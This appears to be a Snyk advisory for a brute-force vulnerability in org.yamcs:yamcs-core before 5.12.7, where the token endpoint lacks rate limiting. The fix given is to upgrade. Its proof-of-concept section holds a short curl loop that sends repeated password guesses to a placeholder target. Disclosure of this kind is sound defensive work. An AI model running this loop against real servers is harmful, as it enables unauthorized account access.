Brute Force Affecting org.yamcs:yamcs-core package, versions [,5.12.7)


Severity

Recommended
0.0
high
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.05% (17th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Brute Force vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JAVA-ORGYAMCS-17230791
  • published8 Jun 2026
  • disclosed27 May 2026
  • creditDaniel Miranda Barcelona

Introduced: 27 May 2026

NewCVE-2026-44596  (opens in a new tab)
CWE-307  (opens in a new tab)

How to fix?

Upgrade org.yamcs:yamcs-core to version 5.12.7 or higher.

Overview

Affected versions of this package are vulnerable to Brute Force through the handleToken process. An attacker can gain unauthorized access to user accounts by performing unlimited authentication attempts without restriction.

PoC

# 20 attempts — zero rate limiting
for i in $(seq 1 20); do
  curl -s -o /dev/null -w "Attempt $i: HTTP %{http_code}\n" \
    -X POST "http://TARGET:8090/auth/token" \
    -d "grant_type=password&username=operator&password=operator12$i"
done
# All return HTTP 401 — no HTTP 429 ever

CVSS Base Scores

version 4.0
version 3.1